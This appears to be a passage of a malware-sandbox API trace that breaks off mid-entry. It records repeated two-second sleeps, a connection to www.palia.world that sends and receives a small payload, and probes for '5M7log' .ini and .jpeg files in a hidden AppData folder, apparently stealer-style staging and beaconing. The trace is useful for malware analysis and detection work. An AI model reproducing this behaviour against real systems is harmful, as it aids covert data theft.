Sleep (dwMilliseconds=0x7d0) [0214.169] Sleep (dwMilliseconds=0x7d0) [0214.171] Sleep (dwMilliseconds=0x7d0) [0214.173] Sleep (dwMilliseconds=0x7d0) [0214.175] Sleep (dwMilliseconds=0x7d0) [0214.176] Sleep (dwMilliseconds=0x7d0) [0214.178] Sleep (dwMilliseconds=0x7d0) [0214.182] Sleep (dwMilliseconds=0x7d0) [0214.187] Sleep (dwMilliseconds=0x7d0) [0214.189] Sleep (dwMilliseconds=0x7d0) [0214.191] Sleep (dwMilliseconds=0x7d0) [0214.192] Sleep (dwMilliseconds=0x7d0) [0214.194] Sleep (dwMilliseconds=0x7d0) [0214.199] Sleep (dwMilliseconds=0x7d0) [0214.202] Sleep (dwMilliseconds=0x7d0) [0214.203] Sleep (dwMilliseconds=0x7d0) [0214.205] Sleep (dwMilliseconds=0x7d0) [0214.210] Sleep (dwMilliseconds=0x7d0) [0214.211] Sleep (dwMilliseconds=0x7d0) [0214.213] Sleep (dwMilliseconds=0x7d0) [0214.214] Sleep (dwMilliseconds=0x7d0) [0214.216] Sleep (dwMilliseconds=0x7d0) [0214.217] Sleep (dwMilliseconds=0x7d0) [0214.219] Sleep (dwMilliseconds=0x7d0) [0214.220] socket (af=2, type=1, protocol=6) returned 0x1b04 [0214.221] getaddrinfo (in: pNodeName="www.palia.world", pServiceName="80", pHints=0x9e760d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e76108 | out: ppResult=0x9e76108*=0xa05e6d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92c10*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0214.226] connect (s=0x1b04, name=0x9f92c10*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0214.245] send (s=0x1b04, buf=0x82e10fa*, len=169, flags=0) returned 169 [0214.245] setsockopt (s=0x1b04, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0214.245] recv (in: s=0x1b04, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 477 [0214.390] closesocket (s=0x1b04) returned 0 [0214.391] Sleep (dwMilliseconds=0x7d0) [0214.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.396] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.396] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0214.396] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0214.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.396] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.396] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0214.396] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0214.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.396] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.396] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0214.396] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0214.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.397] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0214.397] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0214.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.397] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0214.397] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0214.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.397] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0214.397] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0214.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.397] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0214.397] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7500) returned 1 [0214.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.397] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0214.397] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0214.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.398] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.398] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0214.398] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0214.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.398] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.398] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0214.398] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7500) returned 1 [0214.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0214.398] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0214.398] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0214.398] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0214.398] Sleep (dwMilliseconds=0x7d0) [0214.399] Sleep (dwMilliseconds=0x7d0) [0214.401] Sleep (dwMilliseconds=0x7d0) [0214.403] Sleep (dwMilliseconds=0x7d0) [0214.405] Sleep (dwMilliseconds=0x7d0) [0214.408] Sleep (dwMilliseconds=0x7d0) [0214.409] Sleep (dwMilliseconds=0x7d0) [0214.410] Sleep (dwMilliseconds=0x7d0) [0214.412] Sleep (dwMilliseconds=0x7d0) [0214.413] Sleep (dwMilliseconds=0x7d0) [0214.417] Sleep (dwMilliseconds=0x7d0) [0214.419] Sleep (dwMilliseconds=0x7d0) [0214.420] Sleep (dwMilliseconds=0x7d0) [0214.422] Sleep (dwMilliseconds=0x7d0) [0214.423] Sleep (dwMilliseconds=0x7d0) [0214.425] Sleep (dwMilliseconds=0x7d0) [0214.426] Sleep (dwMilliseconds=0x7d0) [0214.428] Sleep (dwMilliseconds=0x7d0) [0214.429] Sleep (dwMilliseconds=0x7d0) [0214.431] Sleep (dwMilliseconds=0x7d0) [0214.432] Sleep (dwMilliseconds=0x7d0) [0214.434] Sleep (dwMilliseconds=0x7d0) [0214.435] Sleep (dwMilliseconds=0x7d0) [0214.437] Sleep (dwMilliseconds=0x7d0) [0214.440] Sleep (dwMilliseconds=0x7d0) [0214.442] Sleep (dwMilliseconds=0x7d0) [0214.443] Sleep (dwMilliseconds=0x7d0) [0214.445] Sleep (dwMilliseconds=0x7d0) [0214.446] Sleep (dwMilliseconds=0x7d0) [0214.450] Sleep (dwMilliseconds=0x7d0) [0214.454] Sleep (dwMilliseconds=0x7d0) [0214.455] Sleep (dwMilliseconds=0x7d0) [0214.457] Sleep (dwMilliseconds=0x7d0) [0214.458] Sleep (dwMilliseconds=0x7d0) [0214.461] Sleep (dwMilliseconds=0x7d0) [0214.463] Sleep (dwMilliseconds=0x7d0) [0214.465] Sleep (dwMilliseconds=0x7d0) [0214.466] Sleep (dwMilliseconds=0x7d0) [0214.468] Sleep (dwMilliseconds=0x7d0) [0214.469] Sleep (dwMilliseconds=0x7d0) [0214.471] Sleep (dwMilliseconds=0x7d0) [0214.472] Sleep (dwMilliseconds=0x7d0) [0214.474] Sleep (dwMilliseconds=0x7d0) [0214.475] Sleep (dwMilliseconds=0x7d0) [0214.477] Sleep (dwMilliseconds=0x7d0) [0214.478] Sleep (dwMilliseconds=0x7d0) [0214.480] Sleep (dwMilliseconds=0x7d0) [0214.481] Sleep (dwMilliseconds=0x7d0) [0214.483] Sleep (dwMilliseconds=0x7d0) [0214.485] Sleep (dwMilliseconds=0x7d0) [0214.486] Sleep (dwMilliseconds=0x7d0) [0214.488] Sleep (dwMilliseconds=0x7d0) [0214.489] Sleep (dwMilliseconds=0x7d0) [0214.491] Sleep (dwMilliseconds=0x7d0) [0214.494] Sleep (dwMilliseconds=0x7d0) [0214.496] Sleep (dwMilliseconds=0x7d0) [0214.497] Sleep (dwMilliseconds=0x7d0) [0214.498] Sleep (dwMilliseconds=0x7d0) [0214.500] Sleep (dwMilliseconds=0x7d0) [0214.501] Sleep (dwMilliseconds=0x7d0) [0214.503] Sleep (dwMilliseconds=0x7d0) [0214.504] Sleep (dwMilliseconds=0x7d0) [0214.506] Sleep (dwMilliseconds=0x7d0) [0214.507] Sleep (dwMilliseconds=0x7d0) [0214.509] Sleep (dwMilliseconds=0x7d0) [0214.510] Sleep (dwMilliseconds=0x7d0) [0214.512] Sleep (dwMilliseconds=0x7d0) [0214.513] Sleep (dwMilliseconds=0x7d0) [0214.515] Sleep (dwMilliseconds=0x7d0) [0214.518] Sleep (dwMilliseconds=0x7d0) [0214.520] Sleep (dwMilliseconds=0x7d0) [0214.521] Sleep (dwMilliseconds=0x7d0) [0214.522] Sleep (dwMilliseconds=0x7d0) [0214.524] Sleep (dwMilliseconds=0x7d0) [0214.526] Sleep (dwMilliseconds=0x7d0) [0214.530] Sleep (dwMilliseconds=0x7d0) [0214.532] Sleep (dwMilliseconds=0x7d0) [0214.533] Sleep (dwMilliseconds=0x7d0) [0214.535] Sleep (dwMilliseconds=0x7d0) [0214.537] Sleep (dwMilliseconds=0x7d0) [0214.539] Sleep (dwMilliseconds=0x7d0) [0214.541] Sleep (dwMilliseconds=0x7d0) [0214.544] Sleep (dwMilliseconds=0x7d0) [0214.545] Sleep (dwMilliseconds=0x7d0) [0214.547] Sleep (dwMilliseconds=0x7d0) [0214.548] Sleep (dwMilliseconds=0x7d0) [0214.550] Sleep (dwMilliseconds=0x7d0) [0214.551] Sleep (dwMilliseconds=0x7d0) [0214.553] Sleep (dwMilliseconds=0x7d0) [0214.554] Sleep (dwMilliseconds=0x7d0) [0214.556] Sleep (dwMilliseconds=0x7d0) [0214.557] Sleep (dwMilliseconds=0x7d0) [0214.561] Sleep (dwMilliseconds=0x7d0) [0214.581] Sleep (dwMilliseconds=0x7d0) [0214.583] Sleep (dwMilliseconds=0x7d0) [0214.585] Sleep (dwMilliseconds=0x7d0) [0214.586] Sleep (dwMilliseconds=0x7d0) [0214.588] Sleep (dwMilliseconds=0x7d0) [0214.589] Sleep (dwMilliseconds=0x7d0) [0214.591] Sleep (dwMilliseconds=0x7d0) [0214.592] Sleep (dwMilliseconds=0x7d0) [0214.594] Sleep (dwMilliseconds=0x7d0) [0214.595] Sleep (dwMilliseconds=0x7d0) [0214.597] Sleep (dwMilliseconds=0x7d0) [0214.598] Sleep (dwMilliseconds=0x7d0) [0214.600] Sleep (dwMilliseconds=0x7d0) [0214.601] Sleep (dwMilliseconds=0x7d0) [0214.603] Sleep (dwMilliseconds=0x7d0) [0214.605] Sleep (dwMilliseconds=0x7d0) [0214.607] Sleep (dwMilliseconds=0x7d0) [0214.608] Sleep (dwMilliseconds=0x7d0) [0214.609] Sleep (dwMilliseconds=0x7d0) [0214.611] Sleep (dwMilliseconds=0x7d0) [0214.612] Sleep (dwMilliseconds=0x7d0) [0214.616] Sleep (dwMilliseconds=0x7d0) [0214.617] Sleep (dwMilliseconds=0x7d0) [0214.619] Sleep (dwMilliseconds=0x7d0) [0214.620] Sleep (dwMilliseconds=0x7d0) [0214.622] Sleep (dwMilliseconds=0x7d0) [0214.623] Sleep (dwMilliseconds=0x7d0) [0214.625] Sleep (dwMilliseconds=0x7d0) [0214.627] Sleep (dwMilliseconds=0x7d0) [0214.628] Sleep (dwMilliseconds=0x7d0) [0214.630] Sleep (dwMilliseconds=0x7d0) [0214.632] Sleep (dwMilliseconds=0x7d0) [0214.633] Sleep (dwMilliseconds=0x7d0) [0214.635] Sleep (dwMilliseconds=0x7d0) [0214.637] Sleep (dwMilliseconds=0x7d0) [0214.639] Sleep (dwMilliseconds=0x7d0) [0214.640] Sleep (dwMilliseconds=0x7d0) [0214.641] Sleep (dwMilliseconds=0x7d0) [0214.643] Sleep (dwMilliseconds=0x7d0) [0214.645] Sleep (dwMilliseconds=0x7d0) [0214.648] Sleep (dwMilliseconds=0x7d0) [0214.650] Sleep (dwMilliseconds=0x7d0) [0214.651] Sleep (dwMilliseconds=0x7d0) [0214.653] Sleep (dwMilliseconds=0x7d0) [0214.655] Sleep (dwMilliseconds=0x7d0) [0214.656] Sleep (dwMilliseconds=0x7d0) [0214.658] Sleep (dwMilliseconds=0x7d0) [0214.661] Sleep (dwMilliseconds=0x7d0) [0214.663] Sleep (dwMilliseconds=0x7d0) [0214.665] Sleep (dwMilliseconds=0x7d0) [0214.666] Sleep (dwMilliseconds=0x7d0) [0214.668] Sleep (dwMilliseconds=0x7d0) [0214.670] Sleep (dwMilliseconds=0x7d0) [0214.671] Sleep (dwMilliseconds=0x7d0) [0214.673] Sleep (dwMilliseconds=0x7d0) [0214.674] Sleep (dwMilliseconds=0x7d0) [0214.676] Sleep (dwMilliseconds=0x7d0) [0214.677] Sleep (dwMilliseconds=0x7d0) [0214.680] Sleep (dwMilliseconds=0x7d0) [0214.682] Sleep (dwMilliseconds=0x7d0) [0214.683] Sleep (dwMilliseconds=0x7d0) [0214.685] Sleep (dwMilliseconds=0x7d0) [0214.686] Sleep (dwMilliseconds=0x7d0) [0214.688] Sleep (dwMilliseconds=0x7d0) [0214.689] Sleep (dwMilliseconds=0x7d0) [0214.691] Sleep (dwMilliseconds=0x7d0) [0214.693] Sleep (dwMilliseconds=0x7d0) [0214.695] Sleep (dwMilliseconds=0x7d0) [0214.696] Sleep (dwMilliseconds=0x7d0) [0214.698] Sleep (dwMilliseconds=0x7d0) [0214.699] Sleep (dwMilliseconds=0x7d0) [0214.701] Sleep (dwMilliseconds=0x7d0) [0214.703] Sleep (dwMilliseconds=0x7d0) [0214.705] Sleep (dwMilliseconds=0x7d0) [0214.706] Sleep (dwMilliseconds=0x7d0) [0214.708] Sleep (dwMilliseconds=0x7d0) [0214.709] Sleep (dwMilliseconds=0x7d0) [0214.711] Sleep (dwMilliseconds=0x7d0) [0214.712] Sleep (dwMilliseconds=0x7d0) [0214.714] Sleep (dwMilliseconds=0x7d0) [0214.715] Sleep (dwMilliseconds=0x7d0) [0214.717] Sleep (dwMilliseconds=0x7d0) [0214.718] Sleep (dwMilliseconds=0x7d0) [0214.720] Sleep (dwMilliseconds=0x7d0) [0214.721] Sleep (dwMilliseconds=0x7d0) [0214.722] Sleep (dwMilliseconds=0x7d0) [0214.724] Sleep (dwMilliseconds=0x7d0) [0214.726] Sleep (dwMilliseconds=0x7d0) [0214.727] Sleep (dwMilliseconds=0x7d0) [0214.729] Sleep (dwMilliseconds=0x7d0) [0214.730] Sleep (dwMilliseconds=0x7d0) [0214.732] Sleep (dwMilliseconds=0x7d0) [0214.733] Sleep (dwMilliseconds=0x7d0) [0214.735] Sleep (dwMilliseconds=0x7d0) [0214.737] Sleep (dwMilliseconds=0x7d0) [0214.739] Sleep (dwMilliseconds=0x7d0) [0214.740] Sleep (dwMilliseconds=0x7d0) [0214.742] Sleep (dwMilliseconds=0x7d0) [0214.743] Sleep (dwMilliseconds=0x7d0) [0214.745] Sleep (dwMilliseconds=0x7d0) [0214.748] Sleep (dwMilliseconds=0x7d0) [0214.749] Sleep (dwMilliseconds=0x7d0) [0214.751] Sleep (dwMilliseconds=0x7d0) [0214.752] Sleep (dwMilliseconds=0x7d0) [0214.754] Sleep (dwMilliseconds=0x7d0) [0214.755] Sleep (dwMilliseconds=0x7d0) [0214.757] Sleep (dwMilliseconds=0x7d0) [0214.758] Sleep (dwMilliseconds=0x7d0) [0214.760] Sleep (dwMilliseconds=0x7d0) [0214.761] Sleep (dwMilliseconds=0x7d0) [0214.763] Sleep (dwMilliseconds=0x7d0) [0214.764] Sleep (dwMilliseconds=0x7d0) [0214.766] Sleep (dwMilliseconds=0x7d0) [0214.768] Sleep (dwMilliseconds=0x7d0) [0214.770] Sleep (dwMilliseconds=0x7d0) [0214.771] Sleep 